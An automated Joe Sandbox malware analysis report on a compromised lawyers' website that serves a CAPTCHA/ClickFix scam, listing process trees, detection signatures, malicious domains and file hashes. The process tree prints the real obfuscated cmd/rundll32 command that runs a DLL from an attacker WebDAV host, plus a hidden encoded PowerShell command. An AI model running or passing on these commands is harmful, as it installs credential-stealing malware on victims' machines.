Windows Analysis Report http://fitlawyers.com.au/contacts Time: 08:18:42 Date: 15/06/2026 Version: 44.0.0 Smoke Quartz General Information Sample URL: http://fitlawyers.com.au/contacts Analysis ID: 5549166 Infos: yara yara yara yara sigma sigma sigma sigma Detection CAPTCHA Scam ClickFix Score: 100 Range: 0 - 100 Confidence: 100% Joe Sandbox may be inaccurate, incomplete, or incorrect. Classification Ransomware Spreading Phishing Banker Trojan / Bot Adware Spyware Exploiter Evader Miner clean clean clean clean clean clean clean suspicious suspicious suspicious suspicious suspicious suspicious suspicious malicious malicious malicious malicious malicious malicious malicious System is w10x64_ra chrome.exe (PID: 4044 cmdline: "C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --s tart-maxim ized "abou t:blank" MD5: DBE43C1D0092437B88CFF7BD9ABC336C ) chrome.exe (PID: 3744 cmdline: "C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S -- servic e-sandbox- type=none --no-pre-r ead-main-d ll --metri cs-shmem-h andle=2060 ,i,1290918 1140176124 744,135679 6779843277 1974,52428 8 --field- trial-hand le=1900,i, 7071452385 63273407,4 8564591061 00130408,2 62144 --va riations-s eed-versio n=20260607 -030035.02 6000-produ ction --mo jo-platfor m-channel- handle=212 0 /prefetc h:3 MD5: DBE43C1D0092437B88CFF7BD9ABC336C ) chrome.exe (PID: 6312 cmdline: "C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt p://fitlaw yers.com.a u/contacts " MD5: DBE43C1D0092437B88CFF7BD9ABC336C ) cmd.exe (PID: 3156 cmdline: cmd /v:on /c "set a= pu&set b=s hd&set r=r un&set d=d ll32&!a!!b ! \\lpuage oo.sanjesh ravani.sho p@SSL\773e e908-8534- 4cf0-a64f- ba935e46a8 1c & !r!!d ! pf.ch,#1 " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE ) rundll32.exe (PID: 1516 cmdline: rundll32 p f.ch,#1 MD5: EF3179D498793BF4234F708D3BE28633 ) rundll32.exe (PID: 7100 cmdline: rundll32 p f.ch,#1 MD5: 889B99C52A60DD49227C5E485A016679 ) chrome.exe (PID: 3676 cmdline: "C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --no -first-run --new-win dow MD5: DBE43C1D0092437B88CFF7BD9ABC336C ) dllhost.exe (PID: 5780 cmdline: "C:\Window s\SysWOW64 \dllhost.e xe" MD5: 6F3C9485F8F97AC04C8E43EF4463A68C ) powershell.exe (PID: 4892 cmdline: C:\Windows \Sysnative \WindowsPo werShell\v 1.0\powers hell.exe - NoProfile -NoLogo -N onInteract ive -Windo wStyle Hid den - Encod edCommand JABzAD0AWw BDAG8AbgBz AG8AbABlAF 0AOgA6AEkA bgAuAFIAZQ BhAGQAVABv AEUAbgBkAC gAKQA7AGkA ZgAoACQAcw AuAEwAZQBu AGcAdABoAC kAewBpAGUA eAAgACQAcw B9AA== MD5: BCF01E61144D6D6325650134823198B8 ) conhost.exe (PID: 2664 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 86191D9E0E30631DB3E78E4645804358 ) cleanup ⊘ No reasoning have been found Process Tree AI Reasoning Malware Configuration Copyright Joe Security LLC 2026 Page 1 of 30 ⊘ No configs have been found This section contains all screenshots as thumbnails, including those not shown in the slideshow. ⊘ No Antivirus matches Screenshots Thumbnails Antivirus, Machine Learning and Genetic Malware Detection Initial Sample Copyright Joe Security LLC 2026 Page 2 of 30 ⊘ No Antivirus matches ⊘ No Antivirus matches ⊘ No Antivirus matches ⊘ No Antivirus matches Joe Sandbox version: 44.0.0 Smoke Quartz Analysis ID: 5549166 Start date and time: 2026-06-15 08:18:42 +02:00 Joe Sandbox product: Cloud Overall analysis duration: Hypervisor based Inspection enabled: false Report type: light Cookbook file name: defaultwindowsinteractivecookbook.jbs Sample URL: http://fitlawyers.com.au/contacts Analysis system description: Windows 10x64 22H2 (Office Professional Plus 2019, Chrome 134, Firefox 122, Adobe Reader 23, Java 8 Update 401, 7-Zip 23.01) Number of analysed new started processes analysed: 33 Number of new started drivers analysed: 1 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 1 Technologies: EGA enabled Analysis Mode: stream Analysis stop reason: Timeout Detection: MAL Classification: mal100.phis.spyw.evad.win@29/66@35/375 Exclude process from analysis (whitelisted): elevation_servi ce.exe, TextInputHost.exe, svc host.exe Excluded IPs from analysis (wh itelisted): 74.125.29.102, 74. 125.29.138, 74.125.29.139, 74. 125.29.100, 74.125.29.101, 74. 125.29.113, 172.217.208.102, 1 72.217.208.139, 172.217.208.10 0, 172.217.208.138, 172.217.20 8.113, 172.217.208.101, 142.25 1.127.84, 74.125.29.95, 192.17 8.170.97, 192.178.170.94, 216. 239.32.36, 216.239.34.36, 216. 239.34.223, 216.239.38.223, 21 6.239.36.223, 216.239.32.223 Excluded domains from analysis (whitelisted): client.wns.win dows.com Not all processes where analyz ed, report is missing behavior information Report size getting too big, t oo many NtOpenFile calls found Report size getting too big, t oo many NtReadVirtualMemory ca lls found. Source Rule Description Author Strings 0000001E.0 0000002.76 97551326.0 000000000A D7000.0000 0004.00000 020.000200 00.0000000 0.sdmp JoeSecurity_Crede ntialStealer Yara detected Credential Stealer Joe Security Dropped Files Unpacked PE Files Domains URLs General Information Warnings Yara Signatures Memory Dumps Copyright Joe Security LLC 2026 Page 3 of 30 Phishing Networking Data Obfuscation Persistence and Installation Behavior Hooking and other Techniques for Hiding and Protection Source Rule Description Author Strings 0.0.pages. csv JoeSecurity_CAPT CHAScam Yara detected CAPTCHA Scam/ ClickFix Joe Security 0.2.pages. csv JoeSecurity_CAPT CHAScam Yara detected CAPTCHA Scam/ ClickFix Joe Security 0.1.pages. csv JoeSecurity_CAPT CHAScam Yara detected CAPTCHA Scam/ ClickFix Joe Security 0.3.pages. csv JoeSecurity_CAPT CHAScam Yara detected CAPTCHA Scam/ ClickFix Joe Security System Summary ⊘ No Suricata rule has matched HTML Sigma Signatures Sigma detected: Suspicious Encoded PowerShell Command Line Sigma detected: Suspicious PowerShell Encoded Command Patterns Sigma detected: Dllhost Internet Connection Sigma detected: Suspicious Execution of Powershell with Base64 Sigma detected: Non Interactive PowerShell Process Spawned Suricata Signatures Joe Sandbox Signatures Yara detected CAPTCHA Scam ClickFix System process connects to network (likely due to code injection or exploit) Suspicious powershell command line found Detect drive by download via clipboard copy & paste HTML page adds supicious text to clipboard Copyright Joe Security LLC 2026 Page 4 of 30 Malware Analysis System Evasion Anti Debugging HIPS / PFW / Operating System Protection Evasion Stealing of Sensitive Information Reconnai ... Resource Developm ... Initial Access Execution Persisten ... Privilege Escalation Defense Evasion Credential Access Discovery Lateral Movement Collection Command and Control Exfiltration Impact Gather Victim Identity Information 1 Scripting Valid Accounts 1 Command and Scripting Interpreter 2 Browser Extensions 3 1 1 Process Injection 1 3 1 Virtualizatio n/Sandbox Evasion 3 OS Credential Dumping 1 System Time Discovery Remote Services 1 Credential API Hooking 2 Encrypted Channel Exfiltration Over Other Network Medium Abuse Accessibility Features Credentials Domains Default Accounts 2 PowerShell 1 Scripting 1 1 DLL Side- Loading 3 1 1 Process Injection 1 Credential API Hooking 1 1 Security Software Discovery Remote Desktop Protocol 4 1 Data from Local System 1 Ingress Tool Transfer Exfiltration Over Bluetooth Network Denial of Service Email Addresses DNS Server Domain Accounts At 1 1 DLL Side- Loading 1 Extra Window Memory Injection 1 Deobfuscate /Decode Files or Information Security Account Manager 1 Process Discovery SMB/Windo ws Admin Shares Data from Network Shared Drive 2 Non- Application Layer Protocol Automated Exfiltration Data Encrypted for Impact Employee Names Virtual Private Server Local Accounts Cron Login Hook Login Hook 1 Rundll32 NTDS 1 3 1 Virtualizatio n/Sandbox Evasion Distributed Component Object Model Input Capture 3 Application Layer Protocol Traffic Duplication Data Destruction Gather Victim Network Information Server Cloud Accounts Launchd Network Logon Script Network Logon Script 1 1 DLL Side- Loading LSA Secrets 1 Application Window Discovery SSH Keylogging Fallback Channels Scheduled Transfer Data Encrypted for Impact Domain Properties Botnet Replication Through Removable Media Scheduled Task RC Scripts RC Scripts 1 Extra Window Memory Injection Cached Domain Credentials 1 1 File and Directory Discovery VNC GUI Input Capture Multiband Communicat ion Data Transfer Size Limits Service Stop DNS Web Services External Remote Services Systemd Timers Startup Items Startup Items Compile After Delivery DCSync 1 2 System Information Discovery Windows Remote Managemen t Web Portal Capture Commonly Used Port Exfiltration Over C2 Channel Inhibit System Recovery Overwrites code with unconditional jumps - possibly settings hooks in foreign process Unusual module load detection (module proxying) Hides threads from debuggers System process connects to network (likely due to code injection or exploit) Encrypted powershell cmdline option found Maps a DLL or memory area into another process Queues an APC in another process (thread injection) Tries to harvest and steal browser information (history, passwords, etc) Tries to harvest and steal ftp login credentials Tries to steal Crypto Currency Wallets Tries to steal from password manager Mitre Att&ck Matrix Copyright Joe Security LLC 2026 Page 5 of 30 Name IP Active Malicious Antivirus Detection Reputation mc.yandex.ru 87.250.250.119 true false high mr-z01.tm-azurefd.net 150.171.110.56 true false high ip-info-mci.svc.avast.com 34.111.175.102 true false high lpuageoo.sanjeshravani.shop 172.67.168.193 true false unknown fitlawyers.com.au 50.87.253.164 true true unknown www.google.com 142.251.153.119 true false high hkg2.db-cluster-pvh-iad3-zone-b-replica02.in.net 172.67.197.174 true true unknown use.fontawesome.com.cdn.cloudflare.net 104.21.27.152 true false high telegra.ph 149.154.164.13 true true unknown bsc-testnet-rpc.publicnode.com 172.66.150.162 true false high link.db-cluster-pvh-iad3-zone-b-replica02.in.net 172.67.197.174 true true unknown confetti.desecratetightly.icu 188.114.97.12 true true unknown mc.yandex.com unknown unknown false high use.fontawesome.com unknown unknown false high otelrules.svc.static.microsoft unknown unknown false high ip-info.ff.avast.com unknown unknown false high www.fitlawyers.com.au unknown unknown false unknown Name Malicious Antivirus Detection Reputation http://fit lawyers.co m.au/conta cts false unknown https://ww w.fitlawye rs.com.au/ contacts false unknown No. of IPs < 25% 25% < No. of IPs < 50% 50% < No. of IPs < 75% 75% < No. of IPs Domains and IPs Contacted Domains Contacted URLs World Map of Contacted IPs Public IPs Copyright Joe Security LLC 2026 Page 6 of 30 IP Domain Country Flag ASN ASN Name Malicious 188.114.97.12 confetti.desecratetightly.ic u Canada 13335 CLOUDFLARENET-CloudflareIncUS true 87.250.250.119 mc.yandex.ru Russia 208398 TELETECHRS false 192.178.170.97 unknown United States 15169 GOOGLE-GoogleLLCUS false 216.239.32.36 unknown United States 15169 GOOGLE-GoogleLLCUS false 172.217.208.102 unknown United States 15169 GOOGLE-GoogleLLCUS false 172.217.208.101 unknown United States 15169 GOOGLE-GoogleLLCUS false 87.250.251.119 unknown Russia 208398 TELETECHRS false 172.67.197.174 hkg2.db-cluster-pvh-iad3- zone-b-replica02.in.net Canada 13335 CLOUDFLARENET-CloudflareIncUS true 50.87.253.164 fitlawyers.com.au United States 31898 ORACLE-BMC-31898-OracleCorporationUS true 216.239.34.223 unknown United States 15169 GOOGLE-GoogleLLCUS false 104.20.24.117 unknown Canada 13335 CLOUDFLARENET-CloudflareIncUS false 34.111.175.102 ip-info-mci.svc.avast.com United States 396982 GOOGLE-CLOUD-PLATFORM-GoogleLLCUS false 1.1.1.1 unknown Australia 13335 CLOUDFLARENET-CloudflareIncUS false 172.67.168.193 lpuageoo.sanjeshravani.s hop Canada 13335 CLOUDFLARENET-CloudflareIncUS false 149.154.164.13 telegra.ph United Kingdom 62041 TELEGRAMVG true 74.125.29.95 unknown United States 15169 GOOGLE-GoogleLLCUS false 192.178.170.138 unknown United States 15169 GOOGLE-GoogleLLCUS false 104.21.27.152 use.fontawesome.com.cd n.cloudflare.net Canada 13335 CLOUDFLARENET-CloudflareIncUS false 138.124.186.2 unknown Germany 215540 GCS-ASGB false 192.178.170.94 unknown United States 15169 GOOGLE-GoogleLLCUS false 77.88.21.119 unknown Russia 208398 TELETECHRS false 138.124.80.141 unknown Finland 215540 GCS-ASGB true 172.66.150.162 bsc-testnet- rpc.publicnode.com Canada 13335 CLOUDFLARENET-CloudflareIncUS false 172.217.208.139 unknown United States 15169 GOOGLE-GoogleLLCUS false 142.251.127.84 unknown United States 15169 GOOGLE-GoogleLLCUS false 74.125.29.100 unknown United States 15169 GOOGLE-GoogleLLCUS false 142.251.153.119 www.google.com United States 15169 GOOGLE-GoogleLLCUS false 74.125.29.102 unknown United States 15169 GOOGLE-GoogleLLCUS false IP 192.168.3.8 192.168.3.9 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: ASCII text , with no line termi nators Category: dropped Size (bytes): 60 Entropy (8bit): 4.038920595031593 Encrypted: false SSDEEP: MD5: D17FE0A3F47BE24A6453E9EF58C94641 SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 Malicious: false Reputation: unknown Preview: # PowerShe ll test fi le to dete rmine AppL ocker lock down mode Private Created / dropped Files C:\Users\u ser\AppDat a\Local\Te mp\__PSScr iptPolicyT est_wu4rlx gl.2qc.psm 1 Copyright Joe Security LLC 2026 Page 7 of 30 Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: gzip compr essed data , from Uni x, origina l size mod ulo 2^32 7 27 Category: downloaded Size (bytes): 325 Entropy (8bit): 7.184212321846557 Encrypted: false SSDEEP: MD5: 6F597E04EA2C957FF6FAA306FF60785F SHA1: F8C0A1279FCD3877BD6BFD78501EDB08F5AC008A SHA-256: F5C4CECE11DF8DADC96F31047B5D542466FE27D6B2744368C339DEA29C26AE68 SHA-512: 2C21233556C9DB225FB1E070F2E7A9F4AFB1B734B394BA51AC10FEC68EA2E767C9C4AD01C24A551DE62D0FA710A9164E2A0775DF2E04F2C1DB52A4595B2E78 00 Malicious: false Reputation: unknown URL: https://www.fitlawyers.com.au/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.css?ver=5.15.3 Preview: .......... .R.N.0...+ ...J...p.Q )R.".p...p .(v....qBZ ...\,....m .8.`...4.. d..7...eH. ....f:.|. j]....JrY. .k.c.. Q.. ...$..T... ..%..!.A.. 5<.kX...+Y `......5.. 5..Y.#|X.c Ur.E0..O8l 4....q.dS. ..7[..U... ..Z..0.2.. a......... ...(K}%./| #&(....qd. .v.H.H;6.. .......].. ...i%c.... >E.Ku\..T. ....Q.mf.. 0.0.sc.iY. .^........ ......... Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: gzip compr essed data , from Uni x, origina l size mod ulo 2^32 1 0255 Category: downloaded Size (bytes): 1460 Entropy (8bit): 7.842356717823773 Encrypted: false SSDEEP: MD5: B4CF19F172840990066C4CD013635419 SHA1: 2DE731D9183FF1BE700477D2CA6E7C459E9CF19F SHA-256: 1ABEE7A1DBE334AA8EFB03575A961902423944B946D866CEC2C9448A96F9B438 SHA-512: 543875524D8A7C1A006E910F5A07CA24E59AE598969E3A09E2109DCB4A0E2F430DC457F771CD1AAD281B1911E5951213083ECAE9B4BD69B8E7940F8655955B8D Malicious: false Reputation: unknown URL: https://www.fitlawyers.com.au/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css?ver=3.24.3 Preview: .......... ...n.8.._. iu%.....we ..M*7..[.. ..tQ.}'6Q. cb`.Da.9g. .y.....t.& .... .J... 0Mk..N..Y. ...M).DNGz wu...y.{.. ':.W.e...Q ......sl.. t..3.-...Z z.+k...O.. y..?y.u%.x .........> .)].....3. .........~ .`.D..3=.. >.Y....D.\ .x.o..i..5 .N.. .#.}. }......da. ..j..?..[. ..J2.5G... 5:..=}0..P )..@.0.... ...bY..p.~ =p.....x.. ......g"z. ..3...]... ......+.qj ...Fq.uj.w .......... .>/.$.._`B .A..{L.... ...q...Y.. ......!... .....,..NH ........Q. Z.G...b... 00w{h.q.s. ...0...{.. ..4..W.O.. ..bm.ny.C. ........gO wYD.>.>... u.{D@.(.2. .......%-O u.d.F|..f. 7..A.....7 ..n.....CQ ..TG..l... 1^..e...j. .$.`....v. ....rF.A.t ....a}..U. Y....w<..O .O.k..~.S. I..K9..... .....{...@ ......(... F...Y.O.., *@w..r4?P. .....9.m[. .....5\WB2 ~B.Z.bw.i. ....>#.n:r ....-.}... ....V..R.> t.J.>7.... S.I..Ir..R 9...^Vc... .^.3..#... .......Y.. ,.'..g.[T. .|...A.Rr. ..xw.d1bj. ..d..j.... .T..f.[`.. rP6.9B.V.. ....(N)..W ....O...F# _.qj3.0..$ .!......@g Y....t..\> ........j> ......=/.s ,.l=.H.... .....,hw.. =.,z;.3r.. .#G....... >T.,(..q.9 (..)#..t.k DN. Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: Zstandard compressed data (v0. 8+), Dicti onary ID: None Category: downloaded Size (bytes): 126471 Entropy (8bit): 7.99508059983301 Encrypted: true SSDEEP: MD5: 9E5D58CDE8446C65522FB4727734FC3D SHA1: 1B1DBA63E260CB0DFBF910D1F21B7A5810904DC0 SHA-256: B933026F26594FEA9385E4946DFCB569F0B842718FF9626F85A7DE240D29CF54 SHA-512: 5ED72D6EC0A7B1D36EB542985A31C778B59BC5F91A566E1083FF1254CFCFC5237B207AC1723CB9437CC3DF8BBF7AFDFD4ED0ECF55D01AA0DD177A9C3ACC47 EA0 Malicious: false Reputation: unknown URL: https://www.googletagmanager.com/gtm.js?id=GTM-5G8857R Preview: (./..2f... ...(...2.D ..6.-D.;.. .Wv..1..7. >..F=.!u.@ &.-L.Cq".. ..D.....m. ...V...{L. Cn.].-..?. .B!8.....a g7!.|a.... q-....{... ..OS.1N... ...t..'... ......X... ..&...b(-. X"(..].9.. .M..Ew.eM. th.5.^.... ....y./... .$.$YX.... ..C...n... (..v.&..c. ..P.....j. .......... ....VfoKg. :.....$.t3 kI..E..!.. .'u0..[.;. .......)j. ......E..h ...Z....J. HQ..o..G.. +.`.(...., ..,B.<.y.. ..^..wbM.. .K..:T..p# .g........ c.+.Z..... mOK.C..Me. ]...[..... ".....ZM.. ...G7[m... R..+.@!..2 .D....k... ..1N.'.1$g u......... .......L.. ....R5.7.. eM.t...Q.i ..P..m`?x L...`...V. .......... .t..3.di.. ..P=../ .. GW.'K..... ....b..... o.=.o.u... .vv..0...f ?...f....* ......2... .3oq..5.i. #....F.0 q tQ..'e...H a].@...... Oq.~.v..e. ".q.]...T. l..!.@.E.. ..;.4.R'~' ...Tku.t.. .?.CQ.c.k. r..0.w.... .x{..n...? [..m..i.b. [w..>[.%.. b..y..m..R .ix....Gec qc.p.%..O. f....f...y .|.;6..... .R....Qb.5 ..Q.,.nR9. .....]..*O .D.(..}... v...0.s... ...EQ}).'K ...-...4qk f..2...... ...z...z.. ~...o.:.g. 8......... \.;.....O. ......n.&. .c|..x.r.n .6u... Chrome Cac he Entry: 226 Chrome Cac he Entry: 227 Chrome Cac he Entry: 228 Copyright Joe Security LLC 2026 Page 8 of 30 Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: gzip compr essed data , from Uni x, origina l size mod ulo 2^32 8 481 Category: downloaded Size (bytes): 3130 Entropy (8bit): 7.924791232712246 Encrypted: false SSDEEP: MD5: 3933E51E850D21533AFEE355ABAE7763 SHA1: 3D778507C26719BFB0BF429878EDCF2F56E50BF4 SHA-256: 8C8E2A270325F3B0028E3100CE78A85E90FE8B82C6DAF4E475925A30BE44A7EC SHA-512: E34464F52B63A92857986C6F4250B489D5DA61C1F8E3F364F5962253D5D9BBA0A7002894A237C295942CEF728F17D78958728D2EEA9F40D46EDD67974530E3EE Malicious: false Reputation: unknown URL: https://www.fitlawyers.com.au/wp-content/plugins/elementor/assets/js/shared-frontend-handlers.03caa53373b56d3bab67.bundle.min.js Preview: .......... .R.s.6..+2 ...g...&.R .=.G..K... 5.Ir..\I.) ...R...... .e[...E..v ..He.c...% }j...s..<. 9.T......J ..JZ.y.x.. ...,.+3... ?....Q.... .....K..7. O..8....V. ..]P...../ *.. Q=.E.. .a."_..3%. .a$..?|... ./.?g....t N..X.J.W.. .L...9J..b ...x..'\.. h._..29... 1..0....rl (.5.J..... ...a..{.f. +&=....I.~ .i^.....y8 /........g .9./...P(. oL(..E.\^c .+_k..a... .1...y.z.M .....r..2. b....z.?.. /.B!.Eo*.. JU.4M.../. V(....v .. ab|....M.. .J..... .y .....d..o. ..B.2!.0$M S........y ...j..p<.y ....xeUY.E R..~v@..+. A......... NM.b....T. .)...${... .o.8.1$... ..~h.....z yC...nQ... 1.6..'...R ......f.Y8 .!.R./..V. .....3O... h..M.9.... .wu..1.... ..."}.n.Vs .Z,.5.@.8. ..8*E.l... ....xA.7.J ...F.E.... .^...A.<.. ;.EN.._.y. y~9u.%G... .V........ ...v`-7X+. .P....d... k.\..H..j. ..cn.f..). &.. .J?.V. ^P.S.f.$.. ..b...)i.. .#.....|.. N......b.. p...;J.... .....O.... Q..|?%...1 .>u..A].H. /._1.|Vj:X ..,.]b.W.7 .%....c.1. ..v.9..6g. .V....n..0 .1/.,.GJ_. lBmz\/.... W.G.H.I... ..W'..+.yD rnyoM.$6.t ....-s*X.. ...&...H.Y w.).C..N.| ..[..CX..$ #...Fn=d Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: gzip compr essed data , from Uni x, origina l size mod ulo 2^32 6 212 Category: downloaded Size (bytes): 2066 Entropy (8bit): 7.908306308446639 Encrypted: false SSDEEP: MD5: C3C0713D5191729CACEAC4893770FD73 SHA1: 507421B11AD272A34BF77890441777F223EB223A SHA-256: 159D4EEE7F9114449E8BB2259D74EA37AC30FE8F69200F391B69D94FC0CF2A0F SHA-512: 08EA1D82A198CFF35750671F0B121FD24CB257215714C8980BDE1E144B4F112F236D6F49E4E4AB41DB837E27C26988D2F7F1F69BE0C30AB4800BC962B7FE2CB2 Malicious: false Reputation: unknown URL: https://www.fitlawyers.com.au/wp-content/uploads/astra-addon/astra-addon-6578dbb2b8d7d1-48550615.js?ver=3.9.2 Preview: .......... .R.n#7.... ..$...yY@- .pf.H..3.. >,.c@5.[.) R!....}... ,.`.d.]u.. d.^~qum.3. f..;Q5...Y .\....w... q/...h.H. ...R..D... %..c.G..}. .V(W6S.1.. .........1 ..C..M.X.. fn..x..i.R .'.S'd^... u.y.l...J. .z*. {....m $..G..|.p[ \k...B..- ..!...H,7 `.8a.o..~. .~aL...e.N .c7..... v ..:...([.= .....A.04E ...../...} . ......@. .Qf.*x"<0. q......y." ..e.LSR`.S R.]>..4... ......^./| ....BX..QR \#)=...^s. ..;(Y+...` /.g.hs.Of. }....?cuc^ ..V.u<8.&2 d..A=..O./ ..w.n.E:.g .-w_l..ZX. ..Pm...@5. _..6E...s3 NA..Vg.... [F.,..y.=C >.?B%..)+. .+ ...... .KM.Tt...B .Cc.6..[.. F(...Za.c. .^]...vcOo .0y.._.u.. ..J......Z ......(.l. !0......e. N........0 ...6M..k.w ......7.!P ..Za.Nr... sjZ.H".@.' n|...@.t.. ..dl.vq... .^\..k..&b .r..n.<..J Q..<..-... .{...).h.[ ...d....z. .9.....:.) #..qk.nL.X ....v.?O.. .v.4.{.9n. ..O.....M{ .z........ O.6......> ]........u .;}....=.. .o..y:.... .3...RG.f. ..r...mK.. .j.r....B. z.9......f .B..LZ...; .E.w.8.... \......... g...1Yj... m.^...4Zb. -...\#..?* J....#q/.. ..H.4...z" k.{1r....j ....zx2..t u.&...V... ... Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: gzip compr essed data , from Uni x, origina l size mod ulo 2^32 5 110 Category: downloaded Size (bytes): 1126 Entropy (8bit): 7.822506694373026 Encrypted: false SSDEEP: MD5: 5C875FBEC29A82B4633511A7289369DD SHA1: AD30E5A3CEF0BAC4B719ABAAEF21ACA90D4460AB SHA-256: 53C7F96AC79E2F744E0F79D13E479D59FC0DCD09CBC1785EAA3C529C3921ABEA SHA-512: 8EDCAC8928CA4C7F1079066A63A0F36E08AE493BE191908407D9C7E5123C15DF03FFA6534A0C4B9E9D4385A0F969EA457F2E321C95EDA0E6B32AE78939508CC 7 Malicious: false Reputation: unknown URL: https://www.fitlawyers.com.au/wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=3.24.0 Chrome Cac he Entry: 229 Chrome Cac he Entry: 230 Chrome Cac he Entry: 231 Copyright Joe Security LLC 2026 Page 9 of 30 Preview: .......... ...r.6.._. 3...QFwY.. @$(qM.*I9N <y...u.... v2.@|..... ..S..y..x+ 4.D.;..?_{ .e.......z B....n..d. .v..p..z.. .......... ....)?S.g. )......o.M .M.%..~... .~.s./{].. OM.......Q j?.x...... ../%...5.8 %=..=..$.. >V.a.|.:.r .w.]%..... ...:..m..m .A...Q.%.& .(.O\..l.. ....^..... ..j...N... c~..p.F<.f ..)..V.... ...R..\=U8 ......K\V. .S.wf.$... .u._.R.`t? ]..p....]& ..X.M..g.8 .?g..y7... ....R2.!$. V..#w...-? ..s...? *m. ..|H..<..z =mS.u.{t.+ '..B...S. .L.Y-._..R ....A.j[.. p.IPP..R,. C.......*. d.)...'.KS ..D..B...X .*%.5L..%3 ..(...}Oj. :.Y.....`\ .]..(A.".. `.i...L..8 P......... Ey.Um.aK.e .Q..$;.... /.ar../X.! ./+.0..H1. t.....:.KG yQ.."c.b0/ .......n.. .,emo0...9 ..R..,...5 .....Y.s.. |...H-.>.q .7....r..4 .lK....m.. ..=...8.>. .@..4MWq.. ....i.]... ...T..(.K. .A..H....g .dw....N.. *."..=.).C ........\D H.e.`.U.+. v(..0..*eM r.SL^W9{W~ .s..O.8.c) @UlG.{..[. 7..O.-...h .....f1... .7.......l .V...a'... B...G..}.z b..?g@.ic% "O-cgp..D. .m^rl...Ms ......!H.. R~.a.J..G. ..dr.N. .. [G..-K.... PXQ.u%X.E. 1.X]...K<a ..v..L.*. Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: gzip compr essed data , from Uni x, origina l size mod ulo 2^32 1 487 Category: downloaded Size (bytes): 530 Entropy (8bit): 7.617300078909492 Encrypted: false SSDEEP: MD5: FA0D476789D33CA3F887B034E70FF111 SHA1: 443A1E17093C0C01E0B80809FF3F27FAC8265D50 SHA-256: F8177164967F4FD61CC3FC9BB216DE7C613E82F0F138D4046AA54C01CE3D2B48 SHA-512: 25478DD77D072FFF395C6A48E282618F27E28872985AB3E6E5FB1858CB056EB1060B6931AA18DA42AD3DD6A0064D5AE614FC1571E10B423DE94D8B8FF3803C1 A Malicious: false Reputation: unknown URL: https://www.fitlawyers.com.au/wp-content/plugins/all-in-one-seo-pack/dist/Lite/assets/css/table-of-contents/global.e90f6d47.css?ver=4.9.8 Preview: .......... .R.n.0...+ ...b.2(.I[ .....a%-.m (R W.\..^J ..$.!-.... rfgv.@..K. ...B?..... Q.....h.i. ..E..A...N .#..m.O+.X N8.3]c...m J.M.SE`.|. <........% ZF."....v. .z/TE.5p.. ..,..t.v.. @.Q..?..H. ..g!.!..l: g..j.O..RC +.....{.!. k..TD5.-.. .=T....... (.u4.e.v.. ..7.z..... .....U:;.w Zh.q.Q5.Z. ..F....>.. my1....8.o ...+j.[y.U 5v......LD o'....F..N .......9)c ...m.Eo... ....L.^.=. 2.g.....r. l..L..&.J. ..D..G.f.. 1.F....._. Wt.{...{). ,....s.... l..39m..M. ..!.'.BI|| .P.5..~S.. ZUQh..ea\. ..?2.[,C.. ..f+5G.(.. h...a... b ..J(.G..;. .U...?.?P. .... Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: gzip compr essed data , from Uni x, origina l size mod ulo 2^32 2 736 Category: downloaded Size (bytes): 1175 Entropy (8bit): 7.832028261204575 Encrypted: false SSDEEP: MD5: 5ACC999A1069FBF0457A47E36105FA6B SHA1: 95F6FC0919DB3BFBA6F853DEDFFF2B8A40D72DB6 SHA-256: 937DC96BFD1FE3A214285DADD8CB7AA2CCFBD719AC4A0AD15EB517C2AC9D24E1 SHA-512: 4237FF29A608BFAA2C73717BC1660869B43C8E0C33D772E216A32AC72E61D90FCC859551DE2A0CF6062D95DBEAC3E24303912CF40A81B04B2AE75D4F40565671 Malicious: false Reputation: unknown URL: https://www.fitlawyers.com.au/wp-content/plugins/bluehost-wordpress-plugin/vendor/newfold-labs/wp-module-performance/build/assets/link-prefetch.min.js?ver=4.17.0 Preview: .......... .Rm..6..+. [E..y.V..h .]..[.].tw ..V....S.. !...8..X.. .|..x^.y.V Tk0.q)g.4. +....d:..d M.1.%H..4. ..k|..\.+. ..`.!z.he^ H.......M. ....'..... .(0G.o.... .5 ....... <....e47.i W.)#t%.S.. ....<#l... ...#..m..v .$D.s.Y.[% 3......p.X -. .J...qK ...../.>.. .......... L...[..... ....Y...[. AeE.MA...L aCn.V.%... |...!F.... F.6rK2.2.. ;.m..~D..& .06....{.. .U.....p[. /XHC.|..5. ..y.`G..B. C...;G...] ..v..\../. B=e$..r... ...7....L. .=...k..]. ..HA~v.".. !d.A....?. .^.......M 4.YPkp.rd* ...A.."m.. ..Q....... .T8..{Tq.! INt...9..6 .#.cQ.~8|. .x...I2h.> Su=..su..i .....y.|TC .H+.u...E. .+.....Z.7 E.7R...B.. LJ.>.i.N.. ...2..]... .0<..=(.^. #......... mi]8!..[.x <Z.{.U.k.= _...../<.E ..D...ED.. ..?..[Z7.. <..f.$.Xel [A... t[.. ..D.i.R.}. `.....S^.z O.......[. ...|xF6... ..^PN.?... l.(d.4M)M/ ..=.....G. .uo......% ..>x.!|.8. .H.H_...Yh .._.o.E.&_ \. {9...... ....-.(... \C..`.M..n LzK.". ..H ..&..GI.t. @.....4... 